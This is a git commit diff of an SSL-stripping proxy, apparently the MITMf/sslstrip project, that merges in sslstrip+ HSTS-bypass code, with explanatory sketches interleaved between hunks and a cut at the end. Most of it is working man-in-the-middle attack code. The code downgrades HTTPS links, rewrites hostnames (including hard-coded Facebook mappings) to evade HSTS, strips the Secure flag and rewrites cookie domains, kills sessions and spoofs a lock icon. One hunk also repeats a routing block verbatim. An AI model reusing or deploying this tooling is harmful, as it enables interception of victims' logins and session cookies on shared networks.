merged sslstrip+ into sslstrip, tweaked HSTS bypass performance

byt3bl33d3r 2014-12-16 02:03:02 +01:00
parent b118106d9d
commit 642fa9cb6a
14 changed files with 234 additions and 954 deletions

View file

@@ -16,7 +16,7 @@
# USA
#
import urlparse, logging, os, sys, random
import urlparse, logging, os, sys, random, re
from twisted.web.http import Request
from twisted.web.http import HTTPChannel
@@ -34,6 +34,7 @@ from URLMonitor import URLMonitor
from CookieCleaner import CookieCleaner
from DnsCache import DnsCache
from libs.sergioproxy.ProxyPlugins import ProxyPlugins
from configobj import ConfigObj
class ClientRequest(Request):
@@ -47,6 +48,7 @@ class ClientRequest(Request):
Request.__init__(self, channel, queued)
self.reactor = reactor
self.urlMonitor = URLMonitor.getInstance()
self.hsts = URLMonitor.getInstance().isHstsBypass()
self.cookieCleaner = CookieCleaner.getInstance()
self.dnsCache = DnsCache.getInstance()
self.plugins = ProxyPlugins.getInstance()
@@ -69,6 +71,23 @@ class ClientRequest(Request):
if 'cache-control' in headers:
del headers['cache-control']
if self.hsts:
if 'if-none-match' in headers:
del headers['if-none-match']
if 'referer' in headers:
real = self.urlMonitor.real
if len(real) > 0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer'])
if 'host' in headers:
host = self.urlMonitor.URLgetRealHost("%s" % headers['host'])
logging.debug("Modifing HOST header: %s -> %s" % (headers['host'],host))
headers['host'] = host
headers['securelink'] = '1'
self.setHeader('Host',host)
self.plugins.hook()
return headers
@@ -104,33 +123,76 @@ class ClientRequest(Request):
except:
pass
url = 'http://' + host + path
self.uri = url # set URI to absolute
if self.hsts:
#self.dnsCache.cacheResolution(host, address)
real = self.urlMonitor.real
patchDict = self.urlMonitor.patchDict
hostparts = host.split(':')
self.dnsCache.cacheResolution(hostparts[0], address)
if len(real) > 0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
path = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), path)
postData = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), postData)
if len(patchDict)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys())))
postData = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), postData)
url = 'http://' + host + path
headers['content-length'] = "%d" % len(postData)
#self.dnsCache.cacheResolution(host, address)
hostparts = host.split(':')
self.dnsCache.cacheResolution(hostparts[0], address)
if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
logging.debug("Sending expired cookies...")
self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client,
host, headers, path))
elif (self.urlMonitor.isSecureFavicon(client, path)):
logging.debug("Sending spoofed favicon response...")
self.sendSpoofedFaviconResponse()
elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)):
if 'securelink' in headers:
del headers['securelink']
logging.debug("LEO Sending request via SSL...(%s %s)"%(client,url))
self.proxyViaSSL(address, self.method, path, postData, headers,
self.urlMonitor.getSecurePort(client, url))
else:
logging.debug("LEO Sending request via HTTP...")
#self.proxyViaHTTP(address, self.method, path, postData, headers)
port = 80
if len(hostparts) > 1:
port = int(hostparts[1])
self.proxyViaHTTP(address, self.method, path, postData, headers, port)
if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
logging.debug("Sending expired cookies...")
self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client,
host, headers, path))
elif (self.urlMonitor.isSecureFavicon(client, path)):
logging.debug("Sending spoofed favicon response...")
self.sendSpoofedFaviconResponse()
elif (self.urlMonitor.isSecureLink(client, url)):
logging.debug("Sending request via SSL...")
self.proxyViaSSL(address, self.method, path, postData, headers,
self.urlMonitor.getSecurePort(client, url))
else:
logging.debug("Sending request via HTTP...")
#self.proxyViaHTTP(address, self.method, path, postData, headers)
port = 80
if len(hostparts) > 1:
port = int(hostparts[1])
self.proxyViaHTTP(address, self.method, path, postData, headers, port)
url = 'http://' + host + path
self.uri = url # set URI to absolute
#self.dnsCache.cacheResolution(host, address)
hostparts = host.split(':')
self.dnsCache.cacheResolution(hostparts[0], address)
if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
logging.debug("Sending expired cookies...")
self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client,
host, headers, path))
elif (self.urlMonitor.isSecureFavicon(client, path)):
logging.debug("Sending spoofed favicon response...")
self.sendSpoofedFaviconResponse()
elif (self.urlMonitor.isSecureLink(client, url)):
logging.debug("Sending request via SSL...")
self.proxyViaSSL(address, self.method, path, postData, headers,
self.urlMonitor.getSecurePort(client, url))
else:
logging.debug("Sending request via HTTP...")
#self.proxyViaHTTP(address, self.method, path, postData, headers)
port = 80
if len(hostparts) > 1:
port = int(hostparts[1])
self.proxyViaHTTP(address, self.method, path, postData, headers, port)
def handleHostResolvedError(self, error):
logging.warning("Host resolution error: " + str(error))
@@ -152,8 +214,22 @@ class ClientRequest(Request):
def process(self):
logging.debug("Resolving host: %s" % (self.getHeader('host')))
host = self.getHeader('host')
#deferred = self.resolveHost(host)
if (self.hsts and host):
real = self.urlMonitor.real
if 'wwww' in host:
logging.debug("Resolving %s for HSTS bypass" % (host))
host = host[1:]
elif 'web' in host:
logging.debug("Resolving %s for HSTS bypass" % (host))
host = host[3:]
elif host in real:
logging.debug("Resolving %s for HSTS bypass" % (host))
host = real[host]
hostparts = host.split(':')
#deferred = self.resolveHost(host)
deferred = self.resolveHost(hostparts[0])
deferred.addCallback(self.handleHostResolvedSuccess)
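
Side note on the HSTS branch added to process() above: before DNS resolution, the tokenized hostname that sslstrip+ handed to the victim (a leading "w" on www. hosts, a "web" prefix otherwise, or an explicit entry in URLMonitor.real) is mapped back to the real host. A minimal standalone sketch of that reverse mapping, with a hypothetical real dict and the prefix checks tightened to startswith for clarity:

real = {'social.facebook.com': 'www.facebook.com'}  # hypothetical, mirrors URLMonitor.real

def untokenize_host(host, real):
    # Reverse the sslstrip+ hostname tokenization (sketch of the logic in process()).
    if host.startswith('wwww.'):        # 'w' + 'www.example.com'
        return host[1:]
    if host.startswith('web'):          # 'web' + 'example.com'
        return host[3:]
    return real.get(host, host)         # explicit mapping from the config, if any

assert untokenize_host('wwww.example.com', real) == 'www.example.com'
assert untokenize_host('weblogin.example.com', real) == 'login.example.com'
assert untokenize_host('social.facebook.com', real) == 'www.facebook.com'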

View file

@@ -44,8 +44,29 @@ class SSLServerConnection(ServerConnection):
return "SECURE POST"
def handleHeader(self, key, value):
if (key.lower() == 'set-cookie'):
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
if ServerConnection.isHsts(self):
if (key.lower() == 'set-cookie'):
newvalues =[]
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
values = value.split(';')
for v in values:
if v[:7].lower()==' domain':
dominio=v.split("=")[1]
logging.debug("LEO Parsing cookie domain parameter: %s"%v)
real = self.urlMonitor.sustitucion
if dominio in real:
v=" Domain=%s"%real[dominio]
logging.debug("LEO New cookie domain parameter: %s"%v)
newvalues.append(v)
value = ';'.join(newvalues)
if (key.lower() == 'access-control-allow-origin'):
value='*'
else:
if (key.lower() == 'set-cookie'):
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
ServerConnection.handleHeader(self, key, value)
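
For reference, the HSTS branch of handleHeader above strips the Secure flag and rewrites the cookie's Domain attribute to the spoofed hostname, so the cookie stays scoped to the domain the victim is actually browsing. A rough self-contained sketch of that transformation (hypothetical sustitucion mapping, lstrip/startswith in place of the v[:7] check):

import re

cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE)
sustitucion = {'.example.com': '.webexample.com'}  # hypothetical, mirrors URLMonitor.sustitucion

def rewrite_set_cookie(value, sustitucion):
    value = cookieExpression.sub(r"\g<1>", value)   # drop the Secure flag
    parts = []
    for part in value.split(';'):
        if part.lstrip().lower().startswith('domain'):
            domain = part.split('=', 1)[1]
            if domain in sustitucion:
                part = ' Domain=%s' % sustitucion[domain]
        parts.append(part)
    return ';'.join(parts)

result = rewrite_set_cookie('sid=abc; Domain=.example.com; Path=/; Secure', sustitucion)
assert result == 'sid=abc; Domain=.webexample.com; Path=/'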

View file

@@ -33,6 +33,11 @@ class ServerConnection(HTTPClient):
urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE)
urlType = re.compile(r"https://", re.IGNORECASE)
urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
urlTypewww = re.compile(r"https://www", re.IGNORECASE)
urlwExplicitPort = re.compile(r'https://www([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
urlToken1 = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE)
urlToken2 = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE)
#urlToken2 = re.compile(r'(https://[a-zA-Z0-9.]+/?[a-zA-Z0-9.]*/?)\?{0}', re.IGNORECASE)
def __init__(self, command, uri, postData, headers, client):
@@ -42,6 +47,7 @@ class ServerConnection(HTTPClient):
self.headers = headers
self.client = client
self.urlMonitor = URLMonitor.getInstance()
self.hsts = URLMonitor.getInstance().isHstsBypass()
self.plugins = ProxyPlugins.getInstance()
self.isImageRequest = False
self.isCompressed = False
@@ -62,6 +68,9 @@ class ServerConnection(HTTPClient):
def getPostPrefix(self):
return "POST"
def isHsts(self):
return self.hsts
def sendRequest(self):
if self.command == 'GET':
message = "%s Sending Request: %s" % (self.client.getClientIP(), self.headers['host'])
@@ -231,19 +240,53 @@ class ServerConnection(HTTPClient):
logging.info("Client connection dropped before request finished.")
def replaceSecureLinks(self, data):
iterator = re.finditer(ServerConnection.urlExpression, data)
if self.hsts:
for match in iterator:
url = match.group()
sustitucion = {}
patchDict = self.urlMonitor.patchDict
if len(patchDict)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys())))
data = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), data)
logging.debug("Found secure reference: " + url)
iterator = re.finditer(ServerConnection.urlExpression, data)
for match in iterator:
url = match.group()
url = url.replace('https://', 'http://', 1)
url = url.replace('&amp;', '&')
self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
logging.debug("Found secure reference: " + url)
nuevaurl=self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
logging.debug("LEO replacing %s => %s"%(url,nuevaurl))
sustitucion[url] = nuevaurl
#data.replace(url,nuevaurl)
data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data)
return re.sub(ServerConnection.urlType, 'http://', data)
#data = self.urlMonitor.DataReemplazo(data)
if len(sustitucion)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, sustitucion.keys())))
data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data)
#logging.debug("LEO DEBUG received data:\n"+data)
#data = re.sub(ServerConnection.urlExplicitPort, r'https://\1/', data)
#data = re.sub(ServerConnection.urlTypewww, 'http://w', data)
#if data.find("http://w.face")!=-1:
# logging.debug("LEO DEBUG Found error in modifications")
# raw_input("Press Enter to continue")
#return re.sub(ServerConnection.urlType, 'http://web.', data)
return data
else:
iterator = re.finditer(ServerConnection.urlExpression, data)
for match in iterator:
url = match.group()
logging.debug("Found secure reference: " + url)
url = url.replace('https://', 'http://', 1)
url = url.replace('&amp;', '&')
self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data)
return re.sub(ServerConnection.urlType, 'http://', data)
def shutdown(self):
if not self.shutdownComplete:
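
The pattern used throughout the HSTS branch above (and in ClientRequest.cleanHeaders) is presumably the "hsts bypass performance" tweak from the commit message: instead of looping str.replace over every known host, the keys of a mapping are joined into one alternation regex and replaced in a single sub() pass. A minimal sketch of the idiom with a hypothetical mapping (m.group(0) is equivalent to the x.string[x.start():x.end()] form used in the diff):

import re

def bulk_replace(data, mapping):
    # One compiled alternation covers every key in a single pass over data.
    if not mapping:
        return data
    dregex = re.compile("(%s)" % "|".join(map(re.escape, mapping.keys())))
    return dregex.sub(lambda m: mapping[m.group(0)], data)

page = '<a href="https://www.facebook.com/login.php">log in</a>'
mapping = {'https://www.facebook.com': 'http://social.facebook.com'}  # hypothetical
assert bulk_replace(page, mapping) == '<a href="http://social.facebook.com/login.php">log in</a>'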

View file

@@ -17,6 +17,8 @@
#
import re, os
import logging
from configobj import ConfigObj
class URLMonitor:
@@ -28,12 +30,26 @@ class URLMonitor:
# Start the arms race, and end up here...
javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]
_instance = None
sustitucion = {} # LEO: diccionario host / sustitucion
real = {} # LEO: diccionario host / real
patchDict = {
'https:\/\/fbstatic-a.akamaihd.net':'http:\/\/webfbstatic-a.akamaihd.net',
'https:\/\/www.facebook.com':'http:\/\/social.facebook.com',
'return"https:"':'return"http:"'
}
def __init__(self):
self.strippedURLs = set()
self.strippedURLPorts = {}
self.redirects = []
self.faviconReplacement = False
self.hsts = False
hsts_config = ConfigObj("./config/hsts_bypass.cfg")
for k,v in hsts_config.items():
self.sustitucion[k] = v
self.real[v] = k
def isSecureLink(self, client, url):
for expression in URLMonitor.javascriptTrickery:
@@ -85,7 +101,7 @@ class URLMonitor:
method = url[0:methodIndex]
pathIndex = url.find("/", methodIndex)
host = url[methodIndex:pathIndex]
host = url[methodIndex:pathIndex].lower()
path = url[pathIndex:]
port = 443
@@ -97,13 +113,34 @@ class URLMonitor:
if len(port) == 0:
port = 443
url = method + host + path
if self.hsts:
#LEO: Sustituir HOST
if not self.sustitucion.has_key(host):
lhost = host[:4]
if lhost=="www.":
self.sustitucion[host] = "w"+host
self.real["w"+host] = host
else:
self.sustitucion[host] = "web"+host
self.real["web"+host] = host
logging.debug("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
self.strippedURLs.add((client, url))
self.strippedURLPorts[(client, url)] = int(port)
url = 'http://' + host + path
#logging.debug("LEO stripped URL: %s %s"%(client, url))
def setValues(self, faviconSpoofing, clientLogging):
self.strippedURLs.add((client, url))
self.strippedURLPorts[(client, url)] = int(port)
return 'http://'+self.sustitucion[host]+path
else:
url = method + host + path
self.strippedURLs.add((client, url))
self.strippedURLPorts[(client, url)] = int(port)
def setValues(self, faviconSpoofing, hstsbypass=False, clientLogging=False,):
self.faviconSpoofing = faviconSpoofing
self.hsts = hstsbypass
self.clientLogging = clientLogging
def isFaviconSpoofing(self):
@@ -112,9 +149,21 @@ class URLMonitor:
def isClientLogging(self):
return self.clientLogging
def isHstsBypass(self):
return self.hsts
def isSecureFavicon(self, client, url):
return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1))
def URLgetRealHost(self,host):
logging.debug("Parsing host: %s"%host)
if self.real.has_key(host):
logging.debug("New host: %s"%self.real[host])
return self.real[host]
else:
logging.debug("New host: %s"%host)
return host
def getInstance():
if URLMonitor._instance == None:
URLMonitor._instance = URLMonitor()
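
URLMonitor now seeds its two host maps from ./config/hsts_bypass.cfg via ConfigObj. The entries below are hypothetical (the real file depends on which HSTS sites you target and on your dns2proxy setup); the sketch feeds ConfigObj a list of lines instead of a file to show how sustitucion (real host -> spoofed host) and real (spoofed host -> real host) get populated:

from configobj import ConfigObj

# Hypothetical entries: each real HSTS host maps to the spoofed name that
# dns2proxy will later resolve back to the original address.
hsts_config = ConfigObj(['www.facebook.com = social.facebook.com',
                         'accounts.google.com = account.google.com'])

sustitucion, real = {}, {}
for k, v in hsts_config.items():
    sustitucion[k] = v   # real host    -> spoofed host
    real[v] = k          # spoofed host -> real host

assert sustitucion['www.facebook.com'] == 'social.facebook.com'
assert real['account.google.com'] == 'accounts.google.com'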

View file

@@ -1,212 +0,0 @@
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import urlparse, logging, os, sys, random, re
from twisted.web.http import Request
from twisted.web.http import HTTPChannel
from twisted.web.http import HTTPClient
from twisted.internet import ssl
from twisted.internet import defer
from twisted.internet import reactor
from twisted.internet.protocol import ClientFactory
from ServerConnectionFactory import ServerConnectionFactory
from ServerConnection import ServerConnection
from SSLServerConnection import SSLServerConnection
from URLMonitor import URLMonitor
from CookieCleaner import CookieCleaner
from libs.sslstrip.DnsCache import DnsCache
from libs.sergioproxy.ProxyPlugins import ProxyPlugins
class ClientRequest(Request):
''' This class represents incoming client requests and is essentially where
the magic begins. Here we remove the client headers we don't like, and then
respond with either favicon spoofing, session denial, or proxy through HTTP
or SSL to the server.
'''
def __init__(self, channel, queued, reactor=reactor):
Request.__init__(self, channel, queued)
self.reactor = reactor
self.urlMonitor = URLMonitor.getInstance()
self.cookieCleaner = CookieCleaner.getInstance()
self.dnsCache = DnsCache.getInstance()
self.plugins = ProxyPlugins.getInstance()
# self.uniqueId = random.randint(0, 10000)
def cleanHeaders(self):
headers = self.getAllHeaders().copy()
if 'accept-encoding' in headers:
del headers['accept-encoding']
if 'referer' in headers:
real = self.urlMonitor.real
if len(real) > 0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer'])
if 'if-modified-since' in headers:
del headers['if-modified-since']
if 'strict-transport-security' in headers: #kill new hsts requests
del headers['strict-transport-security']
logging.info("Zapped HSTS header")
if 'cache-control' in headers:
del headers['cache-control']
if 'if-none-match' in headers:
del headers['if-none-match']
if 'host' in headers:
host = self.urlMonitor.URLgetRealHost("%s" % headers['host'])
logging.debug("Modifing HOST header: %s -> %s" % (headers['host'],host))
headers['host'] = host
headers['securelink'] = '1'
self.setHeader('Host',host)
self.plugins.hook()
return headers
def getPathFromUri(self):
if (self.uri.find("http://") == 0):
index = self.uri.find('/', 7)
return self.uri[index:]
return self.uri
def getPathToLockIcon(self):
if os.path.exists("lock.ico"): return "lock.ico"
scriptPath = os.path.abspath(os.path.dirname(sys.argv[0]))
scriptPath = os.path.join(scriptPath, "../share/sslstrip/lock.ico")
if os.path.exists(scriptPath): return scriptPath
logging.warning("Error: Could not find lock.ico")
return "lock.ico"
def handleHostResolvedSuccess(self, address):
headers = self.cleanHeaders()
# for header in headers:
# logging.debug("HEADER %s = %s",header,headers[header])
logging.debug("Resolved host successfully: %s -> %s" % (self.getHeader('host').lower(), address))
lhost = self.getHeader("host").lower()
host = self.urlMonitor.URLgetRealHost("%s" % lhost)
client = self.getClientIP()
path = self.getPathFromUri()
try:
self.content.seek(0, 0)
except:
pass
postData = self.content.read()
real = self.urlMonitor.real
patchDict = self.urlMonitor.patchDict
if len(real) > 0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
path = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), path)
postData = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), postData)
if len(patchDict)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys())))
postData = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), postData)
url = 'http://' + host + path
headers['content-length'] = "%d" % len(postData)
self.dnsCache.cacheResolution(host, address)
if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
logging.debug("Sending expired cookies...")
self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client,
host, headers, path))
elif (self.urlMonitor.isSecureFavicon(client, path)):
logging.debug("Sending spoofed favicon response...")
self.sendSpoofedFaviconResponse()
elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)):
if 'securelink' in headers:
del headers['securelink']
logging.debug("LEO Sending request via SSL...(%s %s)"%(client,url))
self.proxyViaSSL(address, self.method, path, postData, headers,
self.urlMonitor.getSecurePort(client, url))
else:
logging.debug("LEO Sending request via HTTP...")
self.proxyViaHTTP(address, self.method, path, postData, headers)
def handleHostResolvedError(self, error):
logging.warning("Host resolution error: " + str(error))
try:
self.finish()
except:
pass
def resolveHost(self, host):
address = self.dnsCache.getCachedAddress(host)
if address != None:
logging.debug("Host cached.")
return defer.succeed(address)
else:
logging.debug("Host not cached.")
return reactor.resolve(host)
def process(self):
host = self.urlMonitor.URLgetRealHost("%s"%self.getHeader('host'))
logging.debug("Resolving host: %s" % host)
deferred = self.resolveHost(host)
deferred.addCallback(self.handleHostResolvedSuccess)
deferred.addErrback(self.handleHostResolvedError)
def proxyViaHTTP(self, host, method, path, postData, headers):
connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
connectionFactory.protocol = ServerConnection
self.reactor.connectTCP(host, 80, connectionFactory)
def proxyViaSSL(self, host, method, path, postData, headers, port):
clientContextFactory = ssl.ClientContextFactory()
connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
connectionFactory.protocol = SSLServerConnection
self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory)
def sendExpiredCookies(self, host, path, expireHeaders):
self.setResponseCode(302, "Moved")
self.setHeader("Connection", "close")
self.setHeader("Location", "http://" + host + path)
for header in expireHeaders:
self.setHeader("Set-Cookie", header)
self.finish()
def sendSpoofedFaviconResponse(self):
icoFile = open(self.getPathToLockIcon())
self.setResponseCode(200, "OK")
self.setHeader("Content-type", "image/x-icon")
self.write(icoFile.read())
icoFile.close()
self.finish()

View file

@@ -1,106 +0,0 @@
# Copyright (c) 2004-2011 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import string
class CookieCleaner:
'''This class cleans cookies we haven't seen before. The basic idea is to
kill sessions, which isn't entirely straightforward. Since we want this to
be generalized, there's no way for us to know exactly what cookie we're trying
to kill, which also means we don't know what domain or path it has been set for.
The rule with cookies is that specific overrides general. So cookies that are
set for mail.foo.com override cookies with the same name that are set for .foo.com,
just as cookies that are set for foo.com/mail override cookies with the same name
that are set for foo.com/
The best we can do is guess, so we just try to cover our bases by expiring cookies
in a few different ways. The most obvious thing to do is look for individual cookies
and nail the ones we haven't seen coming from the server, but the problem is that cookies are often
set by JavaScript instead of a Set-Cookie header, and if we block those the site
will think cookies are disabled in the browser. So we do the expirations and whitelisting
based on client,server tuples. The first time a client hits a server, we kill whatever
cookies we see then. After that, we just let them through. Not perfect, but pretty effective.
'''
_instance = None
def getInstance():
if CookieCleaner._instance == None:
CookieCleaner._instance = CookieCleaner()
return CookieCleaner._instance
getInstance = staticmethod(getInstance)
def __init__(self):
self.cleanedCookies = set();
self.enabled = False
def setEnabled(self, enabled):
self.enabled = enabled
def isClean(self, method, client, host, headers):
if method == "POST": return True
if not self.enabled: return True
if not self.hasCookies(headers): return True
return (client, self.getDomainFor(host)) in self.cleanedCookies
def getExpireHeaders(self, method, client, host, headers, path):
domain = self.getDomainFor(host)
self.cleanedCookies.add((client, domain))
expireHeaders = []
for cookie in headers['cookie'].split(";"):
cookie = cookie.split("=")[0].strip()
expireHeadersForCookie = self.getExpireCookieStringFor(cookie, host, domain, path)
expireHeaders.extend(expireHeadersForCookie)
return expireHeaders
def hasCookies(self, headers):
return 'cookie' in headers
def getDomainFor(self, host):
hostParts = host.split(".")
return "." + hostParts[-2] + "." + hostParts[-1]
def getExpireCookieStringFor(self, cookie, host, domain, path):
pathList = path.split("/")
expireStrings = list()
expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + domain +
";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + host +
";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
if len(pathList) > 2:
expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" +
domain + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" +
host + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
return expireStrings
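
A short usage sketch of the cookie-killing flow the docstring describes (hypothetical client IP, host, and cookie values; import path assumed to match the sslstrip package layout used elsewhere in this commit):

from libs.sslstrip.CookieCleaner import CookieCleaner  # assumed path

cleaner = CookieCleaner.getInstance()
cleaner.setEnabled(True)

headers = {'cookie': 'sessionid=abc123; tracking=xyz'}   # hypothetical request
client, host, path = '10.0.0.5', 'mail.example.com', '/inbox/messages'

# The first GET from this (client, domain) pair is "dirty", so expire what we saw;
# afterwards the pair is whitelisted and cookies pass through untouched.
if not cleaner.isClean('GET', client, host, headers):
    for header in cleaner.getExpireHeaders('GET', client, host, headers, path):
        print header   # e.g. sessionid=EXPIRED;Path=/;Domain=.example.com;Expires=...

assert cleaner.isClean('GET', client, host, headers)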

View file

@@ -1,11 +0,0 @@
SSLStrip+
=========
This is a new version of [Moxie's SSLstrip](http://www.thoughtcrime.org/software/sslstrip/) with a new feature to bypass the HTTP Strict Transport Security (HSTS) protection mechanism.
Like the original, this version changes HTTPS to HTTP, but it also changes the hostnames in the HTML code to avoid HSTS. Check my slides from BlackHat ASIA 2014, [OFFENSIVE: EXPLOITING DNS SERVERS CHANGES](http://www.slideshare.net/Fatuo__/offensive-exploiting-dns-servers-changes-blackhat-asia-2014), for more information.
For this to work you also need a DNS server that reverses the changes made by the proxy; you can find it at https://github.com/LeonardoNve/dns2proxy.
Demo video at: http://www.youtube.com/watch?v=uGBjxfizy48
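
Concretely, the rewriting described above does two things to every secure link it finds: the scheme drops to http:// and the hostname is tokenized (an extra leading "w" for www. hosts, a "web" prefix otherwise) so that dns2proxy can resolve the fake name back to the real server. An illustrative sketch with a hypothetical URL:

def strip_and_tokenize(url):
    # What sslstrip+ serves to the victim in place of a secure link (sketch).
    host_and_path = url.split('://', 1)[1]
    host, slash, path = host_and_path.partition('/')
    if host.startswith('www.'):
        host = 'w' + host          # www.example.com   -> wwww.example.com
    else:
        host = 'web' + host        # login.example.com -> weblogin.example.com
    return 'http://' + host + slash + path

assert strip_and_tokenize('https://www.example.com/login') == 'http://wwww.example.com/login'
# dns2proxy must then answer queries for wwww.example.com with www.example.com's address.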

View file

@@ -1,121 +0,0 @@
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging, re, string
from ServerConnection import ServerConnection
class SSLServerConnection(ServerConnection):
'''
For SSL connections to a server, we need to do some additional stripping. First we need
to make note of any relative links, as the server will be expecting those to be requested
via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies.
'''
cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE)
cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE)
iconExpression = re.compile(r"<link rel=\"shortcut icon\" .*href=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
headExpression = re.compile(r"<head>", re.IGNORECASE)
def __init__(self, command, uri, postData, headers, client):
ServerConnection.__init__(self, command, uri, postData, headers, client)
def getLogLevel(self):
return logging.INFO
def getPostPrefix(self):
return "SECURE POST"
def handleHeader(self, key, value):
if (key.lower() == 'set-cookie'):
newvalues =[]
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
values = value.split(';')
for v in values:
if v[:7].lower()==' domain':
dominio=v.split("=")[1]
logging.debug("LEO Parsing cookie domain parameter: %s"%v)
real = self.urlMonitor.sustitucion
if dominio in real:
v=" Domain=%s"%real[dominio]
logging.debug("LEO New cookie domain parameter: %s"%v)
newvalues.append(v)
value = ';'.join(newvalues)
if (key.lower() == 'access-control-allow-origin'):
value='*'
ServerConnection.handleHeader(self, key, value)
def stripFileFromPath(self, path):
(strippedPath, lastSlash, file) = path.rpartition('/')
return strippedPath
def buildAbsoluteLink(self, link):
absoluteLink = ""
if ((not link.startswith('http')) and (not link.startswith('/'))):
absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link
logging.debug("Found path-relative link in secure transmission: " + link)
logging.debug("New Absolute path-relative link: " + absoluteLink)
elif not link.startswith('http'):
absoluteLink = "http://"+self.headers['host']+link
logging.debug("Found relative link in secure transmission: " + link)
logging.debug("New Absolute link: " + absoluteLink)
if not absoluteLink == "":
